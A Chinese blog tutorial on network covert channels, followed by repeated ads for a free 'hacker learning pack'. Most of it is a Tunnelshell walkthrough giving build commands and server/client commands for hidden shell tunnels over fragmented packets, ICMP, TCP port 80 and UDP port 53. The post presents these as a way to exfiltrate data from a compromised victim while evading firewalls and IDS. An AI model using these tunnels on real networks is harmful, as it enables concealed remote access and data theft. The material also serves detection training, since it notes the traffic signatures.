温馨提示:本文仅供网络安全从业者进行自查、演练,请勿用于非法用途!后果自负!
还在以为防火墙和IDS能挡住一切?Too young, too naive!黑客们早就学会了“障眼法”,利用隐蔽通道,在你眼皮子底下光明正大地“偷”数据。这种网络,就像开了“隐身挂”,让你的监控设备统统失效,管理员也只能干瞪眼!
简单来说,隐蔽通道就是一种“瞒天过海”的数据传输方式,让黑客在不被察觉的情况下,把数据从目标机器里悄悄转移出来。这玩意儿,简直就是网络世界的“隐身术”!
目录
- 啥是隐蔽通道?(别眨眼,干货来了!)
- 隐蔽通道的“七十二变”
- Tunnelshell:黑客手中的“瑞士军刀”
- ICMP 隐蔽通道:Ping一下,数据就没了?
- HTTP 隐蔽通道:伪装成网页浏览,太阴险了!
- DNS 隐蔽通道:在域名解析里藏猫腻!
隐蔽通道:黑客的“秘密花园”
隐蔽通道,顾名思义,就是隐藏的、难以被发现的通信路径。它让黑客可以在网络管理员的眼皮子底下,神不知鬼不觉地传输数据。
你可能会问,加密通信也能保护数据,那它和隐蔽通信有啥区别?
关键在于“隐蔽”二字!
加密通信只是对数据进行加密,但通信行为本身还是会被发现。而隐蔽通信,则是连通信行为都隐藏起来,让别人根本不知道你在干啥!
隐蔽通道的“七十二变”
隐蔽通道的种类繁多,让人眼花缭乱。主要分为两种:
- 存储隐蔽通道:通过修改“存储位置”来传递信息。就像间谍电影里,把情报藏在书页里一样。
- 定时隐蔽通道:通过改变“响应时间”来传递信息。比如,发送数据时,故意让网络延迟增加,以此来传递信息。
划重点: 著名的 Spectre 和 Meltdown 漏洞,就是利用了系统的页面缓存作为隐蔽通道来窃取数据的!
这俩哥们儿,简直就是“缓存杀手”,能诱骗你的电脑缓存特权内存,然后通过各种骚操作,把数据偷出来!
Tunnelshell:黑客手中的“瑞士军刀”
黑客们可以用各种协议来创建隐蔽通道,其中,Tunnelshell 就是一个非常流行的工具。
什么是 Tunnelshell?
Tunnelshell 是一个用 C 语言编写的 Linux 程序,采用客户端-服务器模式。它可以建立一个虚拟隧道,让客户端可以访问服务器的 shell。
更牛的是,它支持多种协议,包括 TCP、UDP、ICMP 和 RawIP!
这意味着,黑客可以根据不同的网络环境,选择最合适的协议来建立隐蔽通道。
而且,Tunnelshell 还可以对数据包进行分段,从而绕过防火墙和 IDS 的检测!
实战演练:用 Tunnelshell 建立隐蔽通道
假设我们已经通过 C2 服务器拿到了受害者机器的会话,现在需要创建一个隐蔽的通信通道来进行数据泄露。
准备工作:
- 服务器(Kali Linux)
- 客户端(Ubuntu 18.04)
- 下载 Tunnelshell:Tunnelshell 下载地址
步骤:
-
在服务器和客户端上都安装 Tunnelshell。
下载后,解压文件并进行编译:
tar xvfz tunnelshell_2.3.tgz cd tunnelshell_2.3 make sudo make install
2. 在服务器上打开通信通道。
在终端中执行以下命令:
sudo tunneld默认情况下,它会发送碎片数据包,以逃避防火墙和 IDS 的检测。
3. 在客户端上连接 Tunnelshell。
在终端中执行以下命令:
tunnel -t frag <服务器 IP 地址>例如:
./tunnel -t frag 10.10.10.2如果一切顺利,你就可以成功连接到服务器,并访问受害者机器的 shell!
重点: 使用
netstat命令无法检测到 Tunnelshell 的进程 ID!
4. 使用 Wireshark 抓包分析。
你会发现,两个端点之间的网络流量看起来很普通,但实际上,黑客正在通过碎片数据包传输数据!
ICMP 隐蔽通道:Ping一下,数据就没了?
ICMP 协议通常用于网络诊断,但黑客也可以利用它来建立隐蔽通道。
原理: 通过 ICMP Echo Request 和 Echo Reply 报文来传输数据。
步骤:
-
在服务器上执行以下命令:
sudo ./tunneld -t icmp -m echo-reply,echo
2. 在客户端上执行以下命令:
./tunnel -t icmp -m echo-reply,echo <服务器 IP 地址>例如:
./tunnel -t icmp -m echo-reply,echo 10.10.10.2
通过 Wireshark 抓包,你可以看到 ICMP Echo Request 和 Echo Reply 报文正在两个端点之间传输,而有效负载就是黑客想要窃取的数据!
HTTP 隐蔽通道:伪装成网页浏览,太阴险了!
HTTP 协议是互联网上最常用的协议之一,黑客也可以利用它来建立隐蔽通道。
原理: 建立虚拟 TCP 连接,无需三次握手,不绑定任何端口。
步骤:
-
在服务器上执行以下命令:
sudo ./tunneld -t tcp -p 80,2000
2. 在客户端上执行以下命令:
./tunnel -t tcp -p 80,2000 <服务器 IP 地址>例如:
./tunnel -t tcp -p 80,2000 10.10.10.2
通过 Wireshark 抓包,你可以看到在源和目标之间建立的 TCP 通信没有三次握手,这明显不符合正常的 TCP 连接流程!
DNS 隐蔽通道:在域名解析里藏猫腻!
DNS 协议用于域名解析,黑客也可以利用它来建立隐蔽通道。
原理: 在 DNS 查询和响应报文中嵌入数据。
步骤:
-
在服务器上执行以下命令:
sudo ./tunneld -t udp -p 53,2000
2. 在客户端上执行以下命令:
./tunnel -t udp -p 53,2000 <服务器 IP 地址>例如:
./tunnel -t udp -p 53,2000 10.10.10.2
通过 Wireshark 抓包,你可以看到 DNS 格式错误的数据包,这些数据包就包含了黑客想要传输的数据!
总结
隐蔽通道是一种非常隐蔽的数据传输方式,让黑客可以在网络管理员的眼皮子底下窃取数据。虽然隐蔽通道传输的数据包没有加密,容易被嗅探,但是网络管理员可以通过流量监控和分析,及时发现并阻止隐蔽通道攻击。
黑客/网络安全学习包
资料目录
-
成长路线图&学习规划
-
配套视频教程
-
SRC&黑客文籍
-
护网行动资料
-
黑客必读书单
-
面试题合集
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
**
**
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
